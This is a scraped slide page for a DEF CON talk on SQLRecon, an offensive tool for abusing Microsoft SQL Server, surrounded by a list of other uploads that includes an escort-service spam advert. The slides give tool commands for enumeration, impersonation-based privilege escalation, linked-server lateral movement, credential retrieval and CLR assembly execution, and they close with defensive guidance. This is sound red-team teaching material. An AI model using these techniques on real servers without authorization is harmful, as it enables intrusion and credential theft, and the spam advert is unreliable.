"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentationphoebematthew05
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGMarianaLemus7
 

Recently uploaded (20)

Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentation
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDG
 

DEF CON 31 Demo Labs 2023: Abusing Microsoft SQL Server with SQLRecon

  • 1. Abusing Microsoft SQL Server with SQLRecon Sanjiv Kawa IBM X-Force Red Adversary Services
  • 2. 2 Sanjiv Kawa Senior Managing Security Consultant, Adversary Services at IBM X-Force Red - Red Team Operator - Post-Exploitation Tooling Developer - github.com/xforcered/SQLRecon Intro @sanjivkawa github.com/skahwah IBM X-Force Red
  • 3. 3 Microsoft SQL Server Overview 2 min SQLRecon Overview 4 min 10 Demos! 20 min - Enumeration - Standard Modules - Attacking MS SQL Server with Low Privileges - Abusing MS SQL Impersonation - Attacking Linked MS SQL Servers - Attacking MS MECM / SCCM Databases Defensive Considerations 3 min Questions 5 min Agenda
  • 4. 4 Get Involved! Hack with me - Download the latest release of SQLRecon (v3.3) from github.com/skahwah/SQLRecon/releases - Spin up a Windows VM - Connect to SSID SQLRecon-Lab, don’t worry, it’s safe - Connection details will be provided before demo’s
  • 6. 6 Relational database which allows the storage and retrieval of data Deployed on-premise on top of Microsoft Server or in the cloud Used by businesses of all sizes, not just large enterprise networks Tightly integrated into Active Directory / Azure Active Directory MS SQL Server Overview
  • 7. 7 Why Attack MS SQL Server? Often overlooked Often misconfigured BUILTINUsers can connect to MS SQL Server by default, and: - Execute basic SQL commands - Determine privileges via user mapping/roles - UNC Path injection - Piggyback off rights to compromise linked SQL servers
  • 9. 9 What’s Currently Available? A good amount of offensive MS SQL Server tools already exist
  • 10. 10 How Did This Research Come About? Like most tooling … to solve a problem encountered on an engagement PowerShell is good, but C# is better when evading modern defensive controls Address the MS SQL Server C# post-exploitation tooling gap - Modernize the approach red teamers can take when facing MS SQL Server - Operational Security - Execution Guardrails - SQLRecon works with a diverse set of C2 frameworks - Fork & Run and In-Process compatible
  • 11. 11 Command Line Usage SQLRecon is straight forward to use. There are only three required arguments:
  • 12. 12 Command Line Usage SQLRecon is straight forward to use. There are only three required arguments: - An authentication type SQLRecon.exe /Auth:WinToken
  • 13. 13 Command Line Usage SQLRecon is straight forward to use. There are only three required arguments: - An authentication type - The hostname or IP address for a MS SQL Server SQLRecon.exe /Auth:WinToken /Host:SQL01
  • 14. 14 Command Line Usage SQLRecon is straight forward to use. There are only three required arguments: - An authentication type - The hostname or IP address for a MS SQL Server - A module SQLRecon.exe /Auth:WinToken /Host:SQL01 /Module:databases
  • 15. 15 Command Line Usage SQLRecon is straight forward to use. There are only three required arguments: - An authentication type - The hostname or IP address for a MS SQL Server - A module Example: Enumerating databases on a remote MS SQL Server SQLRecon.exe /Auth:WinToken /Host:SQL01 /Module:databases
  • 16. 16 Command Line Usage SQLRecon is straight forward to use. There are only three required arguments: - An authentication type - The hostname or IP address for a MS SQL Server - A module Example: Enumerating databases on a remote MS SQL Server SQLRecon.exe /Auth:WinToken /Host:SQL01 /Module:databases Shortform command line arguments and case-insensitive SQLRecon.exe /a:wintoken /h:172.16.10.101 /m:databases
  • 17. 17 Authentication Providers SQLRecon supports 5 different MS SQL Server authentication providers: Authentication Type Example WinToken SQLRecon.exe /a:WinToken /h:host /m:module WinDomain SQLRecon.exe /a:WinDomain /d:domain /u:user /p:pass /h:host /m:module Local SQLRecon.exe /a:Local /u:user /p:pass /h:host /m:module AzureAD SQLRecon.exe /a:AzureDomain /d:domain /u:user /p:pass /h:host /m:module AzureLocal SQLRecon.exe /a:AzureLocal /u:user /p:pass /h:host /m:module
  • 18. 18 Module Overview SQLRecon has 83 different modules which can be used against MS SQL Server in a variety of scenarios. Listed below are modules that can facilitate with privilege escalation, lateral movement, or command execution: Module Privilege Escalation Lateral Movement Command Execution xp_cmdshell ✅ ✅ ✅ OLE Automation Procedures ✅ ✅ ✅ CLR Integration for Custom .NET Assemblies ✅ ✅ ✅ Agent Jobs ✅ ✅ ✅ Cleartext ADSI Credential Retrieval ✅ MECM / SCCM User Management ✅ Cleartext MECM / SCCM Credential Retrieval ✅
  • 20. 20 Get Involved! Rules - Don’t DoS the lab. We’re all here to learn together. - Don’t attack each other. We’re all here to learn together. - You can attack AD and AAD if you want, but I promise you, it’s not going to get you anything
  • 21. 21 Get Involved! WiFi SSID: SQLRecon-Lab Password: DefconIsCancelled! Rules - Don’t DoS the lab. We’re all here to learn together. - Don’t attack each other. We’re all here to learn together. - You can attack AD and AAD if you want, but I promise you, it’s not going to get you anything. Lab (kawalabs.local) DC01 172.16.10.100 SQL01 172.16.10.101 SQL02 172.16.10.102 SQL03 172.16.10.104 MECM01 172.16.10.103 ecom01.database.windows.net Test Connection String SQLRecon.exe /a:WinDomain /d:kawalabs /u:jsmith /p:Password123 /h:172.16.10.101 /m:whoami
  • 22. 22 Demo 1 Evaluating the current user’s permissions
  • 24. 24 Demo 2 Locating MS SQL Servers in AD via SPNs
  • 26. 26 Demo 3 Enumerating Azure MS SQL Server Database
  • 28. 28 Demo 4 Unprivileged UNC Path Injection
  • 30. 30 Demo 5 Operational Security and Execution Guardrails
  • 32. 32 Demo 6 Privilege Escalation: Abusing Impersonation BUILTINUsers can impersonate sa!
  • 33. 33 Demo 6 Privilege Escalation: Abusing Impersonation
  • 35. 35 Demo 7 Lateral Movement: Abusing Linked MS SQL Servers SQL02 has an MS SQL Server link to SQL03
  • 36. 36 Demo 7 Lateral Movement: Abusing Linked MS SQL Servers
  • 37. 37 Demo 7 Lateral Movement: Abusing Linked MS SQL Servers - CLR Integration allows custom .NET assemblies to be imported into MS SQL Server - Assemblies get stored inside a SQL database Stored Procedure - You can then execute whatever is inside the custom assembly!
  • 38. 38 Demo 7 Lateral Movement: Abusing Linked MS SQL Servers Basic Template: gist.github.com/skahwah/c92a8ce41f529f40c14715c91b8f90ce Process Hollowing: gist.github.com/skahwah/a585e176e4a5cf319b0c759637f5c410 // sql.cs // C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe /target:library c:tempsql.cs using System; using System.Data; using System.Data.SqlClient; using System.Data.SqlTypes; using Microsoft.SqlServer.Server; using System.Diagnostics; public partial class StoredProcedures { [Microsoft.SqlServer.Server.SqlProcedure] public static void CustomFunctionName() { Process proc = new Process(); proc.StartInfo.FileName = "C:WindowsSystem32notepad.exe"; proc.Start(); } }
  • 40. 40 Demo 8 Credential Abuse: ADSI Double-Link Boomerang SQL03 has an ADSI link to DC01
  • 41. 41 Demo 8 Credential Abuse: ADSI Double-Link Boomerang
  • 43. 43 Demo 9 SCCM / MECM Enumeration
  • 48. 48 Defensive Considerations Check out the Wiki for comprehensive Prevention, Detection and Mitigation guidance! github.com/xforcered/SQLRecon/wiki
  • 49. 49 Defensive Considerations Top 3 MS SQL Server Security Controls - Follow the Microsoft SQL Server best practices! - Consider removing or restricting the BUILTINUsers account and low privilege groups from authenticating against MS SQL Server instances - Evaluate impersonation and MS SQL Server links github.com/xforcered/SQLRecon/wiki
  • 50. 50 Questions or Comments? Thank You @xforcered github.com/xforcered/SQLRecon IBM X-Force Red github.com/skahwah @sanjivkawa